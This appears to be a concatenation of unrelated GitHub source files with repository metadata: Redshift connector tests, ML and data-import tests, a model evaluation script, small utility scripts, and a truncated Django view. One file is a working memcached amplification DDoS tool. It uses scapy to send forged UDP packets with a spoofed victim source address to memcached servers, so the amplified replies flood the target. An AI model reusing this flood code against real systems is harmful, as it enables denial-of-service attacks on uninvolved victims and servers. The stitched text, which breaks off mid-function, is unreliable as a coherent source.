cluster_identifier=CLUSTER_IDENTIFIER,
user='user',
password='sample',
default_database='dev',
connect_timeout=10,
)
@pytest.fixture
def redshift_connector_aws_creds():
return RedshiftConnector(
authentication_method=AuthenticationMethod.AWS_CREDENTIALS.value,
name='test',
host='localhost',
port=0,
db_user='db_user_test',
cluster_identifier=CLUSTER_IDENTIFIER,
access_key_id='access_key',
secret_access_key='secret_access_key',
session_token='token',
default_database='dev',
region='eu-west-1',
)
@pytest.fixture
def redshift_connector_aws_profile():
return RedshiftConnector(
authentication_method=AuthenticationMethod.AWS_PROFILE.value,
name='test',
host='localhost',
port=0,
db_user='db_user_test',
cluster_identifier=CLUSTER_IDENTIFIER,
profile='sample',
default_database='dev',
region='eu-west-1',
)
@pytest.fixture
def redshift_datasource():
return RedshiftDataSource(
domain='test',
name='redshift',
database=DATABASE_NAME,
query='SELECT * FROM public.sales;',
)
def test_config_schema_extra():
schema = {
'properties': {
'type': 'type_test',
'name': 'name_test',
'host': 'host_test',
'port': 0,
'cluster_identifier': 'cluster_identifier_test',
'db_user': 'db_user_test',
'connect_timeout': 'connect_timeout_test',
'authentication_method': 'authentication_method_test',
'user': 'user_test',
'password': 'password_test',
'default_database': 'dev',
'access_key_id': 'access_key_id_test',
'secret_access_key': 'secret_access_key_test',
'session_token': 'session_token_test',
'profile': 'profile_test',
'region': 'region_test',
'enable_tcp_keepalive': True,
}
}
RedshiftConnector.Config().schema_extra(schema)
assert schema['properties'] is not None
keys = list(schema['properties'].keys())
for i in range(len(keys)):
assert keys[i] == ORDERED_KEYS[i]
def test_redshiftdatasource_init_(redshift_datasource):
ds = RedshiftDataSource(domain='test', name='redshift', database='test')
assert ds.language == 'sql'
assert hasattr(ds, 'query_object')
@patch.object(RedshiftConnector, '_retrieve_tables')
def test_redshiftdatasource_get_form(redshift_connector, redshift_datasource):
current_config = {'database': 'dev'}
redshift_connector._retrieve_tables.return_value = ['table1', 'table2', 'table3']
result = redshift_datasource.get_form(redshift_connector, current_config)
assert result['properties']['parameters']['title'] == 'Parameters'
assert result['properties']['domain']['title'] == 'Domain'
assert result['properties']['validation']['title'] == 'Validation'
assert result['required'] == ['domain', 'name']
def test_redshiftconnector_get_connection_params_missing_authentication_mode():
with pytest.raises(ValueError) as exc_info_user:
RedshiftConnector(
name='test',
host='localhost',
cluster_identifier='sample',
port=0,
)
assert AuthenticationMethodError.UNKNOWN.value in str(exc_info_user.value)
def test_redshiftconnector_get_connection_params_db_cred_mode_missing_params():
with pytest.raises(ValueError) as exc_info_user:
RedshiftConnector(
authentication_method=AuthenticationMethod.DB_CREDENTIALS.value,
name='test',
cluster_identifier='sample',
host='localhost',
port=0,
password='pass',
)
assert AuthenticationMethodError.DB_CREDENTIALS.value in str(exc_info_user.value)
# TODO: Partial check due to missing context in some operations (Missing: password)
# with pytest.raises(ValueError) as exc_info_pwd:
# RedshiftConnector(
# authentication_method=AuthenticationMethod.DB_CREDENTIALS.value,
# name='test',
# cluster_identifier='sample',
# host='localhost',
# port=0,
# user='user',
# )
# assert AuthenticationMethodError.DB_CREDENTIALS.value in str(exc_info_pwd.value)
def test_redshiftconnector_get_connection_params_db_cred_mode(redshift_connector):
result = redshift_connector._get_connection_params(database='test')
assert result == dict(
host='localhost',
database='test',
cluster_identifier='toucan_test',
port=0,
timeout=10,
user='user',
password='sample',
tcp_keepalive=True,
)
def test_redshiftconnector_get_connection_params_aws_creds_mode_missing_params():
# TODO: Partial check due to missing context in some operations (Missing: secret_access_key)
# with pytest.raises(ValueError) as exc_info_secret:
# RedshiftConnector(
# authentication_method=AuthenticationMethod.AWS_CREDENTIALS.value,
# name='test',
# cluster_identifier='sample',
# host='localhost',
# port=0,
# db_user='db_user_test',
# access_key_id='access_key',
# session_token='token',
# region='eu-west-1',
# )
# assert AuthenticationMethodError.AWS_CREDENTIALS.value in str(exc_info_secret.value)
with pytest.raises(ValueError) as exc_info_key:
RedshiftConnector(
authentication_method=AuthenticationMethod.AWS_CREDENTIALS.value,
name='test',
cluster_identifier='sample',
host='localhost',
port=0,
db_user='db_user_test',
secret_access_key='secret_access_key',
session_token='token',
region='eu-west-1',
)
assert AuthenticationMethodError.AWS_CREDENTIALS in str(exc_info_key.value)
with pytest.raises(ValueError) as exc_info_db_user:
RedshiftConnector(
authentication_method=AuthenticationMethod.AWS_CREDENTIALS.value,
name='test',
cluster_identifier='sample',
host='localhost',
port=0,
access_key_id='access_key',
secret_access_key='secret_access_key',
session_token='token',
region='eu-west-1',
)
assert AuthenticationMethodError.AWS_CREDENTIALS.value in str(exc_info_db_user.value)
def test_redshiftconnector_get_connection_params_aws_creds_mode(redshift_connector_aws_creds):
result = redshift_connector_aws_creds._get_connection_params(database='test')
assert result == dict(
host='localhost',
database='test',
port=0,
iam=True,
db_user='db_user_test',
cluster_identifier='toucan_test',
access_key_id='access_key',
secret_access_key='secret_access_key',
session_token='token',
region='eu-west-1',
tcp_keepalive=True,
)
def test_redshiftconnector_get_connection_params_aws_profile_mode_missing_params():
with pytest.raises(ValueError) as exc_info_profile:
RedshiftConnector(
authentication_method=AuthenticationMethod.AWS_PROFILE.value,
name='test',
cluster_identifier='toucan_test',
host='localhost',
port=0,
db_user='db_user_test',
region='eu-west-1',
)
assert AuthenticationMethodError.AWS_PROFILE.value in str(exc_info_profile.value)
with pytest.raises(ValueError) as exc_info_db_user:
RedshiftConnector(
authentication_method=AuthenticationMethod.AWS_PROFILE.value,
name='test',
cluster_identifier='sample',
host='localhost',
port=0,
profile='profile',
region='eu-west-1',
)
assert AuthenticationMethodError.AWS_PROFILE.value in str(exc_info_db_user.value)
def test_redshiftconnector_get_connection_params_aws_profile_mode(redshift_connector_aws_profile):
result = redshift_connector_aws_profile._get_connection_params(database='test')
assert result == dict(
host='localhost',
database='test',
port=0,
iam=True,
db_user='db_user_test',
cluster_identifier='toucan_test',
region='eu-west-1',
profile='sample',
tcp_keepalive=True,
)
@pytest.mark.parametrize('opt', (True, False))
def test_redshiftconnector_get_connection_tcp_keepalive(redshift_connector, opt: bool):
redshift_connector.enable_tcp_keepalive = opt
result = redshift_connector._get_connection_params(database='test')
assert result == dict(
host='localhost',
database='test',
cluster_identifier='toucan_test',
port=0,
timeout=10,
user='user',
password='sample',
tcp_keepalive=opt,
)
@patch.object(RedshiftConnector, '_get_connection')
def test_redshiftconnector_retrieve_tables(
mock_connection, redshift_connector, redshift_datasource
):
mock_connection().cursor().__enter__().fetchall.return_value = (
['table1'],
['table2'],
['table3'],
)
result = redshift_connector._retrieve_tables(database=redshift_datasource.database)
assert result == ['table1', 'table2', 'table3']
@patch.object(RedshiftConnector, '_get_connection')
@patch('toucan_connectors.redshift.redshift_database_connector.SqlQueryHelper')
def test_redshiftconnector_retrieve_data(
mock_SqlQueryHelper, mock_get_connection, redshift_connector, redshift_datasource
):
mock_response = Mock()
mock_SqlQueryHelper.count_query_needed.return_value = True
mock_SqlQueryHelper.prepare_limit_query.return_value = Mock(), Mock()
mock_SqlQueryHelper.prepare_count_query.return_value = Mock(), Mock()
mock_get_connection().cursor().__enter__().fetch_dataframe.return_value = mock_response
result = redshift_connector._retrieve_data(datasource=redshift_datasource, get_row_count=True)
assert result == mock_response
@patch.object(RedshiftConnector, '_get_connection')
@patch('toucan_connectors.redshift.redshift_database_connector.SqlQueryHelper')
def test_redshiftconnector_retrieve_data_empty_result(
mock_SqlQueryHelper, mock_get_connection, redshift_connector, redshift_datasource
):
mock_SqlQueryHelper.count_query_needed.return_value = True
mock_SqlQueryHelper.prepare_limit_query.return_value = Mock(), Mock()
mock_SqlQueryHelper.prepare_count_query.return_value = Mock(), Mock()
mock_get_connection().cursor().__enter__().fetch_dataframe.return_value = None
result = redshift_connector._retrieve_data(datasource=redshift_datasource, get_row_count=True)
assert result.empty is True
@patch.object(RedshiftConnector, '_get_connection')
@patch('toucan_connectors.redshift.redshift_database_connector.SqlQueryHelper')
def test_redshiftconnector_retrieve_data_without_count(
mock_SqlQueryHelper, mock_get_connection, redshift_connector, redshift_datasource
):
mock_response = Mock()
mock_SqlQueryHelper.prepare_limit_query.return_value = Mock(), Mock()
mock_get_connection().cursor().__enter__().fetch_dataframe.return_value = mock_response
result = redshift_connector._retrieve_data(datasource=redshift_datasource, limit=10)
assert result == mock_response
@patch.object(RedshiftConnector, '_retrieve_data')
def test_redshiftconnector_get_slice(mock_retreive_data, redshift_datasource, redshift_connector):
mock_df = Mock()
mock_df.__len__ = lambda x: 1
type(mock_df).total_rows = [10]
mock_retreive_data.return_value = mock_df
result = redshift_connector.get_slice(
data_source=redshift_datasource, permissions=None, offset=0, limit=1, get_row_count=True
)
assert result == DataSlice(
df=mock_df,
pagination_info=PaginationInfo(
parameters=OffsetLimitInfo(offset=0, limit=1),
pagination_info=KnownSizeDatasetPaginationInfo(total_rows=10, is_last_page=False),
next_page=OffsetLimitInfo(offset=1, limit=1),
),
)
@patch.object(RedshiftConnector, '_retrieve_data')
def test_redshiftconnector_get_slice_without_count(
mock_retreive_data, redshift_datasource, redshift_connector
):
mock_df = Mock()
mock_df.__len__ = lambda x: 10
mock_retreive_data.return_value = mock_df
result = redshift_connector.get_slice(data_source=redshift_datasource)
assert result == DataSlice(
df=mock_df,
pagination_info=PaginationInfo(
parameters=OffsetLimitInfo(offset=0, limit=None),
pagination_info=KnownSizeDatasetPaginationInfo(total_rows=10, is_last_page=True),
),
)
@patch.object(RedshiftConnector, '_retrieve_data')
def test_redshiftconnector_get_slice_df_is_none(
mock_retreive_data, redshift_datasource, redshift_connector
):
mock_retreive_data.return_value = None
result = redshift_connector.get_slice(data_source=redshift_datasource)
assert result == DataSlice(
df=None,
pagination_info=PaginationInfo(
parameters=OffsetLimitInfo(offset=0, limit=None),
pagination_info=KnownSizeDatasetPaginationInfo(total_rows=0, is_last_page=True),
),
)
def test_redshiftconnector__get_details(redshift_connector):
result = redshift_connector._get_details(index=0, status=True)
assert result == [
('Hostname resolved', True),
('Port opened', False),
('Authenticated', False),
('Default Database connection', False),
]
@patch.object(RedshiftConnector, 'check_hostname')
@patch.object(RedshiftConnector, 'check_port')
@patch('redshift_connector.connect')
def test_redshiftconnector_get_status_true(
mock_check_hostname, mock_check_port, mock_redshift_connector, redshift_connector
):
mock_check_hostname.return_value = 'hostname_test'
mock_check_port.return_value = 'port_test'
mock_redshift_connector.return_value = True
result = redshift_connector.get_status()
assert result.status is True
assert result.error is None
@patch.object(RedshiftConnector, 'check_hostname')
def test_redshiftconnector_get_status_with_error_host(mock_hostname, redshift_connector):
mock_hostname.side_effect = InterfaceError('error mock')
result = redshift_connector.get_status()
assert type(result.error) is str
assert result.status is False
assert str(result.error) == 'error mock'
@patch.object(RedshiftConnector, 'check_port')
def test_redshiftconnector_get_status_with_error_port(mock_port, redshift_connector):
mock_port.side_effect = InterfaceError('error mock')
result = redshift_connector.get_status()
assert type(result.error) is str
assert result.status is False
assert str(result.error) == 'error mock'
@patch.object(RedshiftConnector, '_get_connection')
def test_redshiftconnector_describe(mock_connection, redshift_connector, redshift_datasource):
mock_description = Mock()
type(mock_description).description = [
(b'salesid', 23, None, None, None),
(b'listid', 23, None, None, None),
(b'pricepaid', 1700, None, None, None),
]
mock_connection().cursor().__enter__.return_value = mock_description
result = redshift_connector.describe(data_source=redshift_datasource)
expected = {'salesid': 'INTEGER', 'listid': 'INTEGER', 'pricepaid': 'DECIMAL'}
assert result == expected
def test_get_model(mocker, redshift_connector):
db_names_mock = mocker.patch.object(RedshiftConnector, '_list_db_names', return_value=['dev'])
table_info_mock = mocker.patch.object(RedshiftConnector, '_db_table_info_rows')
table_info_mock.return_value = [
('pg_internal', 'redshift_auto_health_check_436837', 'a', 'integer'),
('public', 'table_1', 'label', 'character varying'),
('public', 'table_1', 'doum', 'character varying'),
('public', 'table_1', 'value1', 'bigint'),
('public', 'table_2', 'label', 'character varying'),
('public', 'table_2', 'doum', 'character varying'),
('public', 'table_2', 'value1', 'bigint'),
('public', 'table_2', 'value2', 'bigint'),
('public', 'table_3', 'label', 'character varying'),
('public', 'table_3', 'group', 'character varying'),
]
assert redshift_connector.get_model() == [
{
'database': 'dev',
'schema': 'pg_internal',
'name': 'redshift_auto_health_check_436837',
'type': 'table',
'columns': [{'name': 'a', 'type': 'integer'}],
},
{
'database': 'dev',
'schema': 'public',
'name': 'table_1',
'type': 'table',
'columns': [
{'name': 'label', 'type': 'character varying'},
{'name': 'doum', 'type': 'character varying'},
{'name': 'value1', 'type': 'bigint'},
],
},
{
'database': 'dev',
'schema': 'public',
'name': 'table_2',
'type': 'table',
'columns': [
{'name': 'label', 'type': 'character varying'},
{'name': 'doum', 'type': 'character varying'},
{'name': 'value1', 'type': 'bigint'},
{'name': 'value2', 'type': 'bigint'},
],
},
{
'database': 'dev',
'schema': 'public',
'name': 'table_3',
'type': 'table',
'columns': [
{'name': 'label', 'type': 'character varying'},
{'name': 'group', 'type': 'character varying'},
],
},
]
db_names_mock.assert_called_once()
table_info_mock.assert_called_once_with('dev')
db_names_mock.reset_mock()
table_info_mock.reset_mock()
redshift_connector.get_model('other-db')
db_names_mock.assert_not_called()
table_info_mock.assert_called_once_with('other-db')
for error in [OperationalError, ProgrammingError]:
mocker.patch.object(RedshiftConnector, '_db_tables_info', side_effect=error('oups'))
assert redshift_connector.get_model() == []
def test_get_model_with_info(mocker, redshift_connector):
db_names_mock = mocker.patch.object(RedshiftConnector, '_list_db_names', return_value=['dev'])
list_table_info_mock = mocker.patch.object(
RedshiftConnector,
'_list_tables_info',
return_value=[
{
'database': 'dev',
'schema': 'public',
'type': 'table',
'name': 'cool',
'columns': [{'name': 'foo', 'type': 'bar'}, {'name': 'roo', 'type': 'far'}],
}
],
)
assert redshift_connector.get_model_with_info() == (
[
{
'columns': [{'name': 'foo', 'type': 'bar'}, {'name': 'roo', 'type': 'far'}],
'database': 'dev',
'name': 'cool',
'schema': 'public',
'type': 'table',
}
],
{},
)
db_names_mock.assert_called_once()
list_table_info_mock.assert_called_once_with('dev')
db_names_mock.reset_mock()
list_table_info_mock.reset_mock()
redshift_connector.get_model_with_info('other-db')
db_names_mock.assert_not_called()
list_table_info_mock.assert_called_once_with('other-db')
# on error
for error in [OperationalError, ProgrammingError]:
mocker.patch.object(RedshiftConnector, '_list_tables_info', side_effect=error('oups'))
assert redshift_connector.get_model_with_info() == (
[],
{'info': {'Could not reach databases': ['dev']}},
)
| ToucanToco/toucan-connectors | tests/redshift/test_redshift.py | test_redshift.py | py | 20,723 | python | en | code | 16 | github-code | 36 | [
{
"api_name": "toucan_connectors.redshift.redshift_database_connector.RedshiftConnector",
"line_number": 26,
"usage_type": "call"
},
{
"api_name": "toucan_connectors.redshift.redshift_database_connector.AuthenticationMethod.DB_CREDENTIALS",
"line_number": 27,
"usage_type": "attribute"
... |
39205903455 | import pytest
import yaml
import os
import json
def load_configuration(filename):
prod_config_file = filename
with open(prod_config_file) as input_file:
config_parameters = yaml.load(input_file, Loader=yaml.FullLoader)
return config_parameters
def load_model_performance(filename):
with open(filename, "r") as input_file:
model_performance = json.load(input_file)
return model_performance
def test_ATTC_1a():
conf_parameters = load_configuration("tests/configuration.yml")
candidate_model_performance = load_model_performance("tests/candidate_models_performance.json")
model_accuracy = candidate_model_performance["general_metrics"]["accuracy"]
minimal_accuracy = conf_parameters["target_metrics"]["accuracy"]
assert model_accuracy >= minimal_accuracy | jacordero/ESA-audio-sentiment-analysis | tests/test_cases/Threshold_test_cases/test_TTC_1a-Accuracy.py | test_TTC_1a-Accuracy.py | py | 812 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "yaml.load",
"line_number": 9,
"usage_type": "call"
},
{
"api_name": "yaml.FullLoader",
"line_number": 9,
"usage_type": "attribute"
},
{
"api_name": "json.load",
"line_number": 14,
"usage_type": "call"
}
] |
39587111591 | import os
import unittest
import dateutil.parser
from dropmunch import munch_data, munch_spec
iso8601_timestamp1 = '2007-10-01T13:47:12.345Z'
valid_datafile_name = 'DATAspecvalid_{0}.txt'.format(iso8601_timestamp1)
class DataFileProcessing(unittest.TestCase):
def setUp(self):
self.working_directory = os.getcwd() + '/fixtures/'
self.munch_data = munch_data.MunchData(self.working_directory)
self.munch_spec = munch_spec.MunchSpec(self.working_directory)
def tearDown(self):
self.munch_spec.delete_all_specs()
"""Test validation and processing of data files"""
def test_datafile_found_db_spec(self):
spec_name = 'DATAspecvalid'
spec_columns = [munch_spec.SpecColumn('color', 7, 'TEXT')]
spec = munch_spec.Spec(spec_name, spec_columns)
self.munch_spec.persist_spec(spec)
datafile_spec = self.munch_data.get_datafile_spec(valid_datafile_name)
self.assertIsNotNone(datafile_spec,
'providing a filename corresponding to a spec available in the db '
'produces a valid DatafileSpec object')
def test_valid_datafile(self):
spec_name = 'DATAspecvalid'
spec_columns = [munch_spec.SpecColumn('color', 7, 'TEXT'),
munch_spec.SpecColumn('sohot_rightnow', 1, 'BOOLEAN')]
spec = munch_spec.Spec(spec_name, spec_columns)
datafile_spec = munch_data.DataFileSpec(spec, dateutil.parser.parse('2007-10-01T13:47:12.345Z'))
self.munch_spec.persist_spec(spec)
import_log_row = self.munch_data.create_import_log(datafile_spec)
datafile_spec = self.munch_data.get_datafile_spec(valid_datafile_name)
self.assertEquals(self.munch_data.process_datafile(valid_datafile_name, datafile_spec, import_log_row['id']),
3,
'3 rows are processed from valid datafile')
def test_padded_boolean_column(self):
self.munch_spec.process_spec_from_file('DATApaddedbool.csv')
spec = self.munch_spec.load_spec_from_db('DATApaddedbool')
datafile_spec = munch_data.DataFileSpec(spec, dateutil.parser.parse(iso8601_timestamp1))
import_log_row = self.munch_data.create_import_log(datafile_spec)
self.assertEquals(self.munch_data.process_datafile('DATApaddedbool_{0}.txt'.format(iso8601_timestamp1),
datafile_spec,
import_log_row['id']),
3,
'3 rows are processed from valid datafile')
def test_invalid_datafile_row(self):
self.munch_spec.process_spec_from_file('DATAspecvalid.csv')
spec = self.munch_spec.load_spec_from_db('DATAspecvalid')
datafile_spec = munch_data.DataFileSpec(spec, dateutil.parser.parse(iso8601_timestamp1))
import_log_row = self.munch_data.create_import_log(datafile_spec)
filename = 'DATAspecvalid_{0}_badrow.txt'.format(iso8601_timestamp1)
processed_row_count = self.munch_data.process_datafile(filename,
datafile_spec,
import_log_row['id'])
self.assertEquals(processed_row_count,
2,
'2 rows are processed from valid datafile {0}'.format(filename))
self.assertEquals(self.munch_data.row_failure_count,
1,
'1 row failed to be processed from datafile {0}'.format(filename))
### TODO - implement unit tests for invalid data conditions :
# def test_data_file_missing_db_spec_found_file_spec(self):
# """when data file's spec is found in filesystem, but
# not in the database a warning is logged and the data file is skipped"""
# self.assertTrue(False)
#
# def test_data_file_missing_spec(self):
# """when data file's spec isn't found in database or in the filesystem, an error is raised"""
# self.assertTrue(False)
#
# def test_data_file_empty(self):
# """when a data file is processed containing no rows, an error is raised"""
# self.assertTrue(False)
#
# def test_data_file_io_error(self):
# """when an io error occurs, an error is raised"""
# self.assertTrue(False)
#
# def test_data_column_invalid_datatype(self):
# """when a column can't be parsed using on the spec width and datatype, an error is raised"""
# self.assertTrue(False)
#
# def test_data_row_missing_characters(self):
# """when a row contains fewer characters than spec, an error is raised"""
# self.assertTrue(False)
#
# def test_data_row_extra_characters(self):
# """when a row contains more characters than spec, an error is raised"""
# self.assertTrue(False)
#
# def test_data_error_saving_to_db(self):
# """when an error occurs while saving data to the database, an error is raised"""
# self.assertTrue(False) | zharben/dropmunch | dropmunch/test/test_munch_data.py | test_munch_data.py | py | 5,174 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "unittest.TestCase",
"line_number": 9,
"usage_type": "attribute"
},
{
"api_name": "os.getcwd",
"line_number": 12,
"usage_type": "call"
},
{
"api_name": "dropmunch.munch_data.MunchData",
"line_number": 13,
"usage_type": "call"
},
{
"api_name": "dropmu... |
40657801370 | import torch
import numpy as np
import torch.nn.functional as F
from models import GetModel
from datagen import DataPool
from WGRutils import WGREnv, WandBScatterMaxlinePlot
import os
import wandb
import argparse
from datetime import datetime
from termcolor import colored
EPS = 1e-8
def temperature_schedule(args, timestep):
normalized_time = timestep / args.timesteps
return args.invtemp_min + normalized_time * (args.invtemp_max - args.invtemp_min)
def query_score(env, seq):
return env.getEnergy(seq, False)
def init_wandb(args):
run = wandb.init(project="WGR-DMGIBBS", config=args)
return run
def main(args):
# Set the device
device = torch.device("cuda" if torch.cuda.is_available() else "cpu")
# Initialize the data pool
print(colored("[INFO] Initializing the data pool...", "green"))
pool = DataPool(args.batch_size, args.seq_length, args.timesteps)
env = WGREnv(args, args.seq_length)
# pool.initialize()
# Initialize the model
print(colored("[INFO] Initializing the model...", "green"))
forwarder, critic = GetModel(args)
print(colored("[MODEL] Forward generator:", "red"))
print(forwarder)
print(colored("[MODEL] Score / entropy critic:", "red"))
print(critic)
# Move the model to the device
print(colored("[INFO] Moving the model to the device...", "green"))
forwarder = forwarder.to(device)
critic = critic.to(device)
if args.resume is not None:
print(colored("[INFO] Resuming from checkpoint %s..." % args.resume, "green"))
checkpoint = torch.load(args.resume)
forwarder.load_state_dict(checkpoint["forwarder"])
critic.load_state_dict(checkpoint["critic"])
print(colored("[INFO] Resumed from checkpoint %s." % args.resume, "yellow"))
else:
print(colored("[ERROR] No checkpoint assigned! aborting ...", "red"))
exit()
print(colored("[INFO] Finished initialization.", "yellow"))
forwarder.eval()
critic.eval()
###############################################################################
# Data preparation
###############################################################################
# Obtain a batch to start
uniform_batch = pool.get_and_store_uniform_batch(args.batch_size)
uniform_batch = uniform_batch.to(device)
uniform_batch = F.one_hot(uniform_batch, num_classes=args.num_alphabet).float()
previous_batch = uniform_batch
for it in range(args.timesteps):
###############################################################################
# Feed-forward
###############################################################################
temperature = temperature_schedule(args, it)
# Obtain forwarder output (probablities)
generated_batch, _ = forwarder(previous_batch, temperature)
# Sample a batch of sequences with torch.distribution from forwarder output logits
sampled_batch_seq = torch.distributions.Categorical(logits=generated_batch).sample()
# One-hot encode the sampled batch sequence
sampled_batch = F.one_hot(sampled_batch_seq, num_classes=args.num_alphabet).float()
sampled_batch_seq = sampled_batch_seq.cpu()
# Obtain energy from the scoring server
true_energy = query_score(env, sampled_batch_seq.numpy()).to(device)
print(
colored(
"[EVALUATION] Time: {:3d}, Energy: {:9.6f}"
.format(it, true_energy.mean()),
"blue"
))
previous_batch = sampled_batch
# Visualization thru WGR
print(sampled_batch_seq)
env.getEnergy(sampled_batch_seq.numpy(), True)
# Press any key to exit
input("Visualization in progress. \nPress any key to exit...")
if __name__ == "__main__":
parser = argparse.ArgumentParser(description='WGR-DMGIBBS')
parser.add_argument('--serverIP', type=str, default='127.0.0.1')
parser.add_argument('--serverPort', type=int, default=4445)
parser.add_argument('--env', type=str, default='testCity')
parser.add_argument('--seq_length', type=int, default=4096)
parser.add_argument('--timesteps', type=int, default=25)
parser.add_argument('--delta_time', type=int, default=1)
parser.add_argument('--num_alphabet', type=int, default=256)
parser.add_argument('--invtemp_min', type=float, default=0.0)
parser.add_argument('--invtemp_max', type=float, default=1.0)
parser.add_argument('--energy_scale', type=float, default=0.001)
parser.add_argument('--dont_invert_score', action='store_true')
parser.add_argument('--batch_size', type=int, default=64)
parser.add_argument('--modelname', type=str, default='placeholder')
parser.add_argument('--resume', type=str, default=None)
args = parser.parse_args()
# Get a unique name by datetime
args.savedir = "saved_models/%s/%s[%s]" % (args.env, args.modelname, datetime.now().strftime("%Y%m%d-%H%M%S"))
args.savepath = os.path.join(args.savedir, "latest.pt")
main(args)
| betairylia/WorldGen-Voxel-DMGibbs | eval.py | eval.py | py | 5,086 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "wandb.init",
"line_number": 25,
"usage_type": "call"
},
{
"api_name": "torch.device",
"line_number": 31,
"usage_type": "call"
},
{
"api_name": "torch.cuda.is_available",
"line_number": 31,
"usage_type": "call"
},
{
"api_name": "torch.cuda",
"lin... |
71514466985 | import numpy as np
import matplotlib.pyplot as plt
x = np.loadtxt('test_accuracies')
plt.figure(figsize=(5.2, 3.1))
plt.errorbar(x[:, 0], x[:, 1:].mean(axis=1), yerr=np.std(x[:, 1:], axis=1, ddof=1), capsize=3, label='SVM accuracy on SNN output')
plt.axhline(y=95, color='orange', linestyle='--', label='SVM accuracy on MFSC features')
plt.xlabel('Number of training samples')
plt.ylabel('Accuracy')
plt.legend()
plt.tight_layout()
plt.savefig('accuracy.png')
plt.show()
| colinshane/stdp-conv-speech | figures/accuracy.py | accuracy.py | py | 475 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "numpy.loadtxt",
"line_number": 5,
"usage_type": "call"
},
{
"api_name": "matplotlib.pyplot.figure",
"line_number": 7,
"usage_type": "call"
},
{
"api_name": "matplotlib.pyplot",
"line_number": 7,
"usage_type": "name"
},
{
"api_name": "matplotlib.pypl... |
27691178390 | # Import modules
import random
from scapy.all import IP, UDP, send, Raw
from colorama import Fore
# Load MEMCACHED servers list
with open("tools/L4/memcached_servers.txt", "r") as f:
memcached_servers = f.readlines()
# Payload
payload = "\x00\x00\x00\x00\x00\x01\x00\x00stats\r\n"
def flood(target):
server = random.choice(memcached_servers)
packets = random.randint(10, 150)
server = server.replace("\n", "")
# Packet
try:
packet = (
IP(dst=server, src=target[0])
/ UDP(sport=target[1], dport=11211)
/ Raw(load=payload)
)
send(packet, count=packets, verbose=False)
except Exception as e:
print(
f"{Fore.MAGENTA}Error while sending forged UDP packet\n{Fore.MAGENTA}{e}{Fore.RESET}"
)
else:
print(
f"{Fore.GREEN}[+] {Fore.YELLOW}Sending {packets} forged UDP packets from memcached server {server} to {'{}:{}'.format(*target)}.{Fore.RESET}"
)
| LimerBoy/Impulse | tools/L4/memcached.py | memcached.py | py | 1,026 | python | en | code | 2,202 | github-code | 36 | [
{
"api_name": "random.choice",
"line_number": 15,
"usage_type": "call"
},
{
"api_name": "random.randint",
"line_number": 16,
"usage_type": "call"
},
{
"api_name": "scapy.all.IP",
"line_number": 21,
"usage_type": "call"
},
{
"api_name": "scapy.all.UDP",
"line_n... |
21188323810 | # Мне надоело постоянно менять номер версии в разных файлах, поэтому появился данный скрипт :)
import io
newver = input("Введите номер новой версии: ")
f = open("installer.iss", "rt")
buf = f.readlines()
f.close()
f = open("installer.iss", "wt")
for item in buf:
if item.startswith("#define MyAppVersion "):
print(item.strip(), "---> ", end="")
item = "#define MyAppVersion \"" + newver + "\"\n"
print(item)
f.write(item)
f.close()
f = io.open("main.py", mode="rt", encoding="utf-8")
buf = f.readlines()
f.close()
f = io.open("main.py", mode="wt", encoding="utf-8")
for item in buf:
if item.startswith("VER = "):
print(item.strip(), "---> ", end="")
item = "VER = \"" + newver + "\"\n"
print(item)
f.write(item)
f.close()
f = io.open("README.md", mode="rt", encoding="utf-8")
buf = f.readlines()
f.close()
f = io.open("README.md", mode="wt", encoding="utf-8")
for item in buf:
if item.startswith("Текущая версия: "):
print(item.strip(), "---> ", end="")
item = "Текущая версия: **v" + newver + "** \n"
print(item)
f.write(item)
f.close()
| student-proger/BellManager | changeVersion.py | changeVersion.py | py | 1,195 | python | ru | code | 0 | github-code | 36 | [
{
"api_name": "io.open",
"line_number": 19,
"usage_type": "call"
},
{
"api_name": "io.open",
"line_number": 22,
"usage_type": "call"
},
{
"api_name": "io.open",
"line_number": 31,
"usage_type": "call"
},
{
"api_name": "io.open",
"line_number": 34,
"usage_t... |
44306025103 | import click
from datetime import timedelta
from pathlib import Path
from typing import Iterable
# this library does not come with type stubs, so we tell mypy to ignore it
import pytimeparse # type: ignore
from urbasys import log_utils
from urbasys.urbackup import retention
BACKUP_ROOT_DIR = "/urbackup/mirror"
@click.group()
@click.option("-v", "--verbose", count=True)
@click.option("-q", "--quiet", count=True)
def main(verbose, quiet):
log_utils.setup_logging(verbose, quiet)
@main.command(name="retain-monthlies", help="Keeps one backup snapshot per month.")
@click.argument(
"backups-root-dirs",
nargs=-1,
type=click.Path(path_type=Path, dir_okay=True, exists=True),
)
@click.option("-n", "--dry-run", is_flag=True)
@click.option(
"--keep-latest",
default=30,
type=int,
help="The number of latest snapshots to keep. "
"After that only the oldest snapshot of the month will be kept.",
)
def retain_monthlies(
backups_root_dirs: Iterable[Path], dry_run: bool, keep_latest: int
) -> None:
for backup_root_dir in backups_root_dirs:
retention.retain_monthlies(backup_root_dir, dry_run, keep_latest)
@main.command(
name="delete-old",
help="Deletes backup folders older than a certain amount of time.",
)
@click.argument(
"backups-root-dirs",
nargs=-1,
type=click.Path(path_type=Path, dir_okay=True, exists=True),
)
@click.option("-n", "--dry-run", is_flag=True)
@click.option(
"--max-age",
required=True,
type=lambda arg: timedelta(seconds=pytimeparse.parse(arg)),
help="Snapshots older than this will be deleted.",
)
@click.option(
"--min-keep",
default=5,
type=int,
help="The minimum number of snapshots to keep (even if they are older than `--max-age`).",
)
def delete_old(
backups_root_dirs: Iterable[Path], dry_run: bool, max_age: timedelta, min_keep: int
) -> None:
for backup_root_dir in backups_root_dirs:
retention.delete_old(backup_root_dir, dry_run, max_age, min_keep)
| urbas/urbasys | urbasys/urbackup/app.py | app.py | py | 2,012 | python | en | code | 2 | github-code | 36 | [
{
"api_name": "urbasys.log_utils.setup_logging",
"line_number": 20,
"usage_type": "call"
},
{
"api_name": "urbasys.log_utils",
"line_number": 20,
"usage_type": "name"
},
{
"api_name": "click.group",
"line_number": 16,
"usage_type": "call"
},
{
"api_name": "click.o... |
34846400693 | from django.shortcuts import render, redirect
from django.contrib.auth.decorators import login_required
from django.db.models import CharField, Value, Q
from itertools import chain
from authentication.models import User
from website.models import Review, UserFollows, Ticket
from website import forms
@login_required
def flux(request):
"""
Gérer le flux pour afficher les tickets et les avis de l'utilisateur et de ses abonnés
"""
# Récupérer les identifiants des utilisateurs suivis par l'utilisateur connecté
